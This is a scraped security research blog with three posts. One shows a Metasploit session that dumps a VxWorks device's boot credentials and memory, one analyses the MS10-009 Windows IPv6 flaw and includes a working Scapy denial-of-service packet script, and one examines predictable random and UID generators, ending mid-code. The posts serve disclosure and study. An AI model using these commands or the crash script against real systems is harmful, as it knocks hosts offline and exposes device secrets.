|_<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> | |<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> |_|<o:p></o:p></span></span></span></div><div class="MsoNormal"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span></div><div class="MsoNormal"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> =[ metasploit v3.4.2-dev [core:3.4 api:1.0]<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">+ -- --=[ 584 exploits - 297 auxiliary<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">+ -- --=[ 219 payloads - 27 encoders - 8 nops<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> =[ svn r10182 updated today (2010.08.29)<o:p></o:p></span></span></span></div><div class="MsoNormal"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">msf| use auxiliary/scanner/vxworks/wdbrpc_bootline <o:p></o:p></span></span></span><br />
<span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">msf auxiliary(wdbrpc_bootline)| set RHOSTS 192.168.1.1/32<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">RHOSTS =| 192.168.1.1/32<o:p></o:p></span></span></span><br />
<span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">msf auxiliary(wdbrpc_bootline)| run<o:p></o:p></span></span></span></div><div class="MsoNormal"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[*] 192.168.1.1: VxWorks5.4.2 Centillium Palladia 4K <o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[*] 192.168.1.1: BOOT: tffs=0,0(0,0)host:/tffs/vxworks.s e=192.168.1.4:0xffffff00 h=192.168.1.10 u=p220 pw=p220<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[*] Scanned 1 of 1 hosts (100% complete)<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[*] Auxiliary module execution completed<o:p></o:p></span></span></span></div><div class="MsoNormal"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">msf auxiliary(wdbrpc_bootline)| use auxiliary/admin/vxworks/wdbrpc_memory_dump <o:p></o:p></span></span></span><br />
<span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">msf auxiliary(wdbrpc_memory_dump)| set RHOST 192.168.1.1<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">RHOST =| 192.168.1.1<o:p></o:p></span></span></span><br />
<span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">msf auxiliary(wdbrpc_memory_dump)| set LPATH /tmp/memory.dmp<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">LPATH =| /tmp/memory.dmp<o:p></o:p></span></span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"><br />
</span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">msf auxiliary(wdbrpc_memory_dump)| run<o:p></o:p></span></span></span></div><div class="MsoNormal"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[*] Attempting to dump system memory...<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[*] 192.168.1.1 Connected to VxWorks5.4.2 - Centillium Palladia 4K ()<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[*] Dumping 0x00fef800 bytes from base address 0x80000000 at offset 0x00000000...<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[*] [ 00 % ] Downloaded 0x00000b18 of 0x00fef800 bytes (complete at Sun Aug 29 09:55:11 +0200 2010)<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[*] [ 00 % ] Downloaded 0x000010a4 of 0x00fef800 bytes (complete at Sun Aug 29 09:55:34 +0200 2010)<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">(...)<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[*] Dumped 0x00fefba0 bytes.<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[*] Auxiliary module execution completed</span></span><o:p></o:p></span></div><div class="MsoNormal"><br />
</div><div class="MsoNormal"><span lang="EN-US">The complete memory dump decompiles cleanly in <a href="http://hex-rays.com/idapro/">IDA Pro</a> [*] (base ROM address is kindly provided by the debugger).<o:p></o:p></span><br />
<span lang="EN-US"><br />
</span><br />
<span lang="EN-US">Unfortunately for the demo, it appears that no hardcoded account is to be found. User accounts and (cleartext) passwords are stored within a configuration file. But that was a fun exercise anyway :)</span><br />
<span lang="EN-US"><br />
</span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://newsoft.dyndns.org/tech/VxWorks.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://newsoft.dyndns.org/tech/VxWorks.png" /></a></div><br />
</div><span class="Apple-style-span" style="font-size: small;">[*] Actually not, I had to request a patch for the MIPS processor module :)</span>newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com3tag:blogger.com,1999:blog-26480225.post-46735076599598874012010-02-24T23:00:00.002+01:002010-02-24T23:00:02.012+01:00MS10-009A very long time ago, Microsoft patches used to be boring. Then Microsoft invented the <a href="http://microsoft.com/sdl">SDL</a>. The amount of patches and vulnerabilities fixed in Microsoft products did not decrease, but each bug became a unique and very interesting one...<br />
<br />
<a href="http://www.microsoft.com/technet/security/bulletin/ms10-feb.mspx">February 2010 patches</a> are no exception to this rule: each one of them provides enlightenment for the security researcher.<br />
<br />
Let's begin this blog series with <a href="http://www.microsoft.com/technet/security/bulletin/MS10-009.mspx">MS10-009</a>: "Vulnerabilities in Windows TCP/IP Could Allow Remote Code Execution". This is some kind of Holy Grail in computer security: remote code execution through IP packets only!<br />
<br />
First of all, this flaw affects Windows Vista and Windows 2008 Server "R1" only. For Windows Vista, Microsoft rewrote the whole TCP/IP stack with the objective to build a native IPv4/IPv6 dual stack. In the process they added a lot of kernel stuff, such as <a href="http://blogs.msdn.com/wndp/archive/2006/02/24/538746.aspx">Winsock Kernel</a> (WSK), and they removed deprecated stuff, such as SYN Flood protections (<a href="http://technet.microsoft.com/en-us/library/cc938202.aspx">SynAttackProtect</a> et al. registry keys).<br />
<br />
Writing a TCP/IP stack is not a task for the faint of heart. Despite Microsoft hiring all sorts of talented engineers, the new stack <a href="http://www.symantec.com/avcenter/reference/ATR-VistaAttackSurface.pdf">was found vulnerable</a> to Blat (before build 5270), <a href="http://en.wikipedia.org/wiki/Land_attack">Land</a> (before build 5270) and <a href="http://en.wikipedia.org/wiki/Teardrop_attack#Teardrop_Attacks">Teardrop</a> (before build 5384) attacks.<br />
<br />
Even after Vista public release, several security bulletins have been published, addressing issues in the new TCP/IP stack - namely: <a href="http://www.microsoft.com/technet/security/Bulletin/MS08-001.mspx">MS08-001</a>, <a href="http://www.microsoft.com/technet/security/Bulletin/MS08-004.mspx">MS08-004</a> (this one being specific to Vista) and <a href="http://www.microsoft.com/technet/security/Bulletin/MS09-048.mspx">MS09-048</a> (this one having a rating of "critical" on Windows Vista and 2008 only).<br />
<br />
Therefore, Windows Vista and 2008 TCP/IP stack cannot be considered "mature" and remains an interesting playground for security researchers. Interestingly, MS10-009 vulnerabilities were silently fixed in Windows Seven and 2008 "R2", showing that Microsoft engineers are doing their homework on their side.<br />
<br />
Now let's get to the point:<br />
<div></div>1. ICMPv6 Router Advertisement Vulnerability - CVE-2010-0239<br />
<em>"A remote code execution vulnerability exists in the Windows TCP/IP stack due to insufficient bounds checking when processing specially crafted ICMPv6 Router Advertisement packets. An anonymous attacker could exploit the vulnerability by sending specially crafted ICMPv6 Router Advertisement packets to a computer with IPv6 enabled."</em><br />
<br />
2. Header MDL Fragmentation Vulnerability - CVE-2010-0240<br />
<em>"A remote code execution vulnerability exists in the Windows TCP/IP stack due to the manner in which the TCP/IP stack handles specially crafted Encapsulating Security Payloads (ESP) over UDP datagram fragments when running a custom network driver."</em><br />
<br />
3. ICMPv6 Route Information Vulnerability - CVE-2010-0241<br />
<em>"A remote code execution vulnerability exists in the Windows TCP/IP stack due to insufficient bounds checking when processing specially crafted ICMPv6 Route Information packets. An anonymous attacker could exploit the vulnerability by sending specially crafted ICMPv6 Route Information packets to a computer with IPv6 enabled."</em><br />
<br />
4. TCP/IP Selective Acknowledgement Vulnerability - CVE-2010-0242<br />
<em>"A denial of service vulnerability exists in TCP/IP processing in Microsoft Windows due to an error in the processing of specially crafted TCP packets with a malformed selective acknowledgment (SACK) value."</em><br />
<br />
According to <a href="http://support.microsoft.com/kb/974145">KB974145</a>, several files are updated by MS10-009 patch. However we are going to focus on where the meat is, namely "TCPIP.SYS". All screenshots below apply to Windows 2008 "R1" English 32-bit.<br />
<br />
Using <a href="http://www.zynamics.com/bindiff.html">BinDiff 3</a>, it quickly appears that 39 functions have a similarity of less than "1.00".<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://newsoft.dyndns.org/tech/ms10_009_diff.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="512" kt="true" src="http://newsoft.dyndns.org/tech/ms10_009_diff.png" width="640" /></a></div><br />
<div>Thanks to debugging symbols provided by Microsoft, matching flaws with functions names is pretty straightforward:</div><ul><li>IppIsUdpEspPacket / IppReceiveUdpEspList will probably be in the path of flaw #2.</li>
<li>TcpEnqueueTcbSack will probably in the path of flaw #4.</li>
<li>IppHandleNeighborAdvertisement / Ipv6pHandleRouterAdvertisement will probably be in the path of flaws #1 and #3, which we are targeting today.</li>
</ul>From that point, diffing is pretty straightforward.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://newsoft.dyndns.org/tech/ms10_009_diff_v6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="384" kt="true" src="http://newsoft.dyndns.org/tech/ms10_009_diff_v6.png" width="640" /></a></div><div></div>On the left side (patched version), data size is pre-tested against 0x20, whereas on the right side (vulnerable version), data size is post-tested.<br />
<br />
Let's have a deeper look at the <a href="http://msdn.microsoft.com/en-us/library/bb259912.aspx">NdisGetDataBuffer</a> function, which is new to NDIS 6 (Windows Vista and up):<br />
<br />
"<em>Call the NdisGetDataBuffer function to gain access to a contiguous block of data from a NET_BUFFER structure.</em><br />
<em></em><br />
<div></div><em>PVOID NdisGetDataBuffer(</em><br />
<em></em><br />
<div><em>IN PNET_BUFFER NetBuffer,</em></div><em></em><br />
<div><em>IN ULONG BytesNeeded, </em></div><em>IN PVOID Storage,</em><br />
<em>IN UINT AlignMultiple,</em><br />
<em>IN UINT AlignOffset</em><br />
<em>);</em><br />
<em>(…)</em><em> </em><br />
<em><strong>Storage</strong>: a pointer to a buffer, or NULL if no buffer is provided by the caller. The buffer must be greater than or equal in size to the number of bytes specified in BytesNeeded. <strong>If this value is non-NULL, and the data requested is not contiguous, NDIS copies the requested data to the area indicated by Storage.</strong></em>"<br />
<br />
This API is quite hard to understand and clearly violates the principle of least surprise.<br />
<br />
The <a href="http://msdn.microsoft.com/en-us/library/bb245897.aspx">NET_BUFFER</a> structure holds a <a href="http://msdn.microsoft.com/en-us/library/bb245893.aspx">NET_BUFFER_HEADER</a> structure, in which a <a href="http://msdn.microsoft.com/en-us/library/bb245889.aspx">NET_BUFFER_DATA</a> structure can be found, which stores a <a href="http://www.microsoft.com/whdc/driver/tips/mdl.mspx">Memory Descriptor List</a> (MDL).<br />
<br />
Let's assume that the caller passed a non-NULL <strong>Storage</strong> parameter to this function. If all packet data has already been allocated into a single (contiguous) memory area, NdisGetDataBuffer will simply return a pointer to this area. However, if packet data is split across several memory areas, NdisGetDataBuffer will concatenate everything into the <strong>Storage</strong> buffer. <em>This is where the flaw lies, since <strong>Storage</strong> is a static buffer of 0x20 bytes allocated on stack</em> (in case of Prefix Info option), <em>whereas the vulnerable ICMPv6 option(s) can be of any size</em> (options being passed in Type-Length-Value format).<br />
<br />
Now, the last question is: how to force allocation of non-contiguous memory areas? The answer is obvious: using fragmentation, since packets are copied in memory "as is" at NDIS level …<br />
<br />
A bit of <a href="http://www.natisbad.org/scapy/">Scapy</a> magic later, here is one possible command to invoke the dreaded Blue Screen of Death on any IPv6-enabled remote system. This is a fragmented Router Advertisement (RA), using a non standard "Prefix Info" of length of 255. Please note that option size is given in multiples of 8, therefore the following code will trash 255*8 = 2040 bytes of kernel stack with byte 0x41.<br />
<blockquote>v6_dst = "fe80::bd92:3788:79b0:c5d1"<br />
<br />
mac_dst = "00:0c:29:de:9b:a8"<br />
<br />
pkt = IPv6(dst=v6_dst, hlim=255) / IPv6ExtHdrFragment() / ICMPv6ND_RA() / ICMPv6NDOptPrefixInfo(len=255, prefixlen=64, prefix="2001::") / Raw(load='A'*2008)<br />
<br />
l=fragment6(pkt, 1500)<br />
<br />
for p in l:<br />
sendp(Ether(dst=mac_dst)/p, iface="eth0")</blockquote>This is not the only NdisGetDataBuffer-based flaw that has been fixed, therefore other ICMPv6 options could be used to achieve the same result.<br />
<br />
Now, is this ethical to release such a piece of information to the general public? Well, yes, considering the following mitigations:<br />
<ul><li>This affects only IPv6-enabled Windows Vista and Windows 2008 "R1" systems (but IPv6 is enabled by default).</li>
<li>Microsoft provided a patch a few weeks ago.</li>
<li>This could raise NDIS 6 developers' awareness.</li>
<li>"Some people" have been working on it for more than 1 year, so it should be considered "available" (if not public).</li>
<li>Since Router Advertisements are not honored when TTL is lower than 255, this attack works only on the local subnet and could not be used to wreak havoc on the Internet.</li>
<li>"/GS" has proved so far to be an effective mitigation against remote code execution through this flaw ("it is just a DoS"™) – not to mention kernel-mode ASLR.</li>
<li>This is a good Scapy + IPv6 use case.</li>
</ul>I might not say the same about other TCP/IP flaws that were fixed in this patch, such as the Selective Acknowledgement one …<br />
<br />
Mandatory greetz: <a href="http://natisbad.org/">Arnaud Ebalard</a> (of Scapy6 fame) and <a href="http://droids-corp.org/~serpilliere/">Fabrice Desclaux</a> (of Rr0d fame).newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com8tag:blogger.com,1999:blog-26480225.post-73298735223850732052009-09-11T08:00:00.002+01:002009-09-11T08:00:00.453+01:00Unique is not Random is not Secure<i>Unique</i>, <i>Random </i>and <i>Secure </i>are three (very) different concepts. Misunderstanding those concepts could lead to severe security issues, as related in this story. However, I had to remove names from the (not so) innocent applications that were harmed :) <div><br /></div><div>Unique values are needed everywhere in modern computing: ActiveX GUIDs, HTTP session cookies, ... However, while some of those values have no identified security impact (e.g. ActiveX GUIDs), others shall meet very strong security properties (e.g. HTTP session cookies).</div><div><br /></div><div>An attacker should at least not be able to guess some or all values that have been or will be generated. A stronger property is the inability for the attacker to guess past or future values, even if he has access to a subset of generated values at some point.</div><div><div><br /></div><div>Let's take a "uniqueness generator" that returns an integer value (whatever size is that integer). How unique this value can be?</div><div><br /></div><div><b><span class="Apple-style-span" style="font-size:large;">Unique values</span></b></div><div><br /></div><div>The value is <i>unique</i> if two successive calls to the same function are guaranteed not to yield the same result.</div><div><br /></div><div>This property is very easy to achieve, either through a monotonous counter (0, 1, 2, 3 ...) or a timestamp. But those generators do not meet even the lowest security requirements formulated before: they are very easy to predict at any time. Fortunately, cookie value == timestamp has disappeared from the Internet years ago.</div><div><br /></div><div>Some better generators exist, such as <a href="http://fr.wikipedia.org/wiki/Globally_Unique_Identifier">GUID</a> and <a href="http://fr.wikipedia.org/wiki/Universal_Unique_Identifier">UUID</a>. Older GUID generators were based on MAC address and timestamp, therefore having far lesser possible outputs than the entire value space. Recent GUID generators are based on cryptographically sound random generators (see below).</div><div><br /></div><div><div>Of course, there are limits to "uniqueness": at least the size of the output value. Everything stored on 32 bits will be easy to find out, even if it comes out of a 160 bits hashing algorithm. Moreover, values can be unique to a given computer only, a given process, or even a given thread.</div></div><div><br /></div><div><b><span class="Apple-style-span" style="font-size:large;">Random values</span></b></div><div><br /></div><div>For security-related tasks, it is often critical to use non-predictable unique generators. Therefore most people began to think "unique == random".</div><div><br /></div><div>However, true randomness is very difficult to achieve (as <a href="http://www.suspekt.org/2008/08/17/mt_srand-and-not-so-random-numbers/">PHP knows</a>).</div><div><br /></div><div>The simplest random generator is the <a href="http://en.wikipedia.org/wiki/Linear_congruential_generator">Linear Congruential generator</a>. All values are correlated through the following formula: x<sub>n+1</sub> = A * x<sub>n</sub> + B [N], where A, B and N are fixed values.</div><div><br /></div><div>On Windows, the <a href="http://msdn.microsoft.com/en-us/library/398ax69y(VS.71).aspx">rand()</a> function of MSVCRT.DLL uses the following parameters:</div><div>A = 214013</div><div>B = 2531011</div><div>N = 2<sup>32</sup></div><div></div><div>Internal state is maintained on 32 bits. However, only the 16 upper bits are returned as a result, masked with 0x7fff. Therefore, rand() produces values between 0 and <a href="http://msdn.microsoft.com/en-us/library/2dfe3bzd(VS.71).aspx">RAND_MAX</a>, which has a hardcoded value of 2<sup>15<span class="Apple-style-span" style="font-size:16;"></span></sup>.</div><div><br /></div><div>This is confirmed on Windows Seven 64-bit as seen below.</div><div><br /></div><div><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/tech/rand.png"><img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; WIDTH: 230px; DISPLAY: block; HEIGHT: 332px; CURSOR: hand" border="0" alt="" src="http://newsoft.dyndns.org/tech/rand.png" /></a></div><div>Therefore, the odds of guessing rand() output on a single shot is 1 out of 2<sup>15</sup>, which is already bad (as <a href="http://blogs.technet.com/srd/archive/2008/04/09/ms08-020-how-predictable-is-the-dns-transaction-id.aspx">DNS knows</a>).</div><div><br /></div><div>But finding out rand() internal state (which is trivial with a few known output values) could prove far more catastrophic. In fact, rand() should never be used at all - it is mostly there for compatibility reasons. Good Windows applications make use of <a href="http://msdn.microsoft.com/en-us/library/aa379942(VS.85).aspx">CryptGenRandom()</a>.</div><div></div><div> </div><div>Out of curiosity, I also had a look at the <a href="http://www.gnu.org/software/libc/">GNU libc</a>. It turned out that rand() has several implementations, the most basic of which (referred as "type 0") being a Linear Congruential generator with the following parameters:</div><div>A = 1103515245<br />B = 12345<br />N = 2<sup>32</sup></div><div>RAND_MAX = 2<sup>31</sup></div><div> </div><div>Using this generator to produce int or unsigned int values will immediately leak the internal generator state to the client.</div><div> </div><div>Newer implementations use a <a href="http://en.wikipedia.org/wiki/LFSR">Linear Feedback Shift Register</a>.</div><div> </div><div><span class="Apple-style-span" style="font-size:large;"><b>Secure values</b></span></div><div><br /></div><div>As we saw earlier, random does not always mean secure. But even if the developer used a cryptographically strong random generator, it can still fall prey to implementation mistakes.</div><div><br /></div><div>One recent example I had is the (Sun provided) <a href="http://java.sun.com/j2se/1.4.2/docs/api/java/rmi/server/UID.html">java.rmi.server.UID</a> class. Each word is important:</div><div><blockquote>"A UID represents an identifier that is unique over time with respect to the host it is generated on, or one of 2<sup>16</sup> "well-known" identifiers. (...) A UID instance contains three primitive values:</blockquote><blockquote><blockquote><i>unique</i>, an int that uniquely identifies the VM that this UID was generated in, with respect to its host and at the time represented by the time value (an example implementation of the unique value would be a process identifier), or zero for a well-known UID</blockquote><blockquote><i>time</i>, a long equal to a time (as returned by System.currentTimeMillis()) at which the VM that this UID was generated in was alive, or zero for a well-known UID</blockquote><blockquote><i>count</i>, a short to distinguish UIDs generated in the same VM with the same time value"</blockquote></blockquote></div><div>So, secure or not? Hard to tell from the documentation ... Let's run the following code sample:</div><div><br /></div><div><div><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">package uidtest;</span></span></div><div><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">import java.rmi.server.UID;</span></span></div><div><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">public class Main {</span></span></div><div><span style="WHITE-SPACE: pre" class="Apple-tab-span"><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"></span></span></span><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">public static void main(String[] args) {</span></span></div><div><span style="WHITE-SPACE: pre" class="Apple-tab-span"><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"></span></span></span><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">for (int i=0; i < 5; i++) {</span></span></div><div><span style="WHITE-SPACE: pre" class="Apple-tab-span"><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"></span></span></span><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">UID u = new UID();</span></span></div><div><span style="WHITE-SPACE: pre" class="Apple-tab-span"><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"></span></span></span><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">System.out.println(u);</span></span></div><div><span style="WHITE-SPACE: pre" class="Apple-tab-span"><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"></span></span></span><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">}</span></span></div><div><span style="WHITE-SPACE: pre" class="Apple-tab-span"><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"></span></span></span><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">}</span></span></div><div><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">}</span></span></div><div><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"><br /></span></span></div><div><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">$ javac uidtest.java</span></span></div><div><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">$ java uidtest</span></span></div><div><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"><br /></span></span></div><div><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">-8241e54:12334a437e6:-8000</span></span></div><div><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">-8241e54:12334a437e6:-7fff</span></span></div><div><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">-8241e54:12334a437e6:-7ffe</span></span></div><div><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">-8241e54:12334a437e6:-7ffd</span></span></div><div><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">-8241e54:12334a437e6:-7ffc</span></span></div></div><div><br /></div><div>So, it appears that <i>this </i><i>UID generator is a simple monotonous counter</i>.</div><div><br /></div><div>Since the <a href="http://openjdk.java.net/">Sun JDK</a> has been open-sourced, it is possible to have a deeper look at the implementation:</div><div><br /></div><div><div><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">public UID() {</span></span></div><div><span style="WHITE-SPACE: pre" class="Apple-tab-span"><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"></span></span></span><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">synchronized (lock) {</span></span></div><div><span style="WHITE-SPACE: pre" class="Apple-tab-span"><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"></span></span></span><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">if (!hostUniqueSet) {</span></span></div><div><span style="WHITE-SPACE: pre" class="Apple-tab-span"><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"></span></span></span><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">hostUnique = (new SecureRandom()).nextInt();</span></span></div><div><span style="WHITE-SPACE: pre" class="Apple-tab-span"><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"></span></span></span><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">hostUniqueSet = true;</span></span></div><div><span style="WHITE-SPACE: pre" class="Apple-tab-span"><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"></span></span></span><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">}</span></span></div><div><span style="WHITE-SPACE: pre" class="Apple-tab-span"><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"></span></span></span><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">unique = hostUnique;</span></span></div><div><span style="WHITE-SPACE: pre" class="Apple-tab-span"><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"></span></span></span><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">if (lastCount == Short.MAX_VALUE) {</span></span></div><div><span style="WHITE-SPACE: pre" class="Apple-tab-span"><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"></span></span></span><span class="Apple-style-span" style="font-size:small;"><span 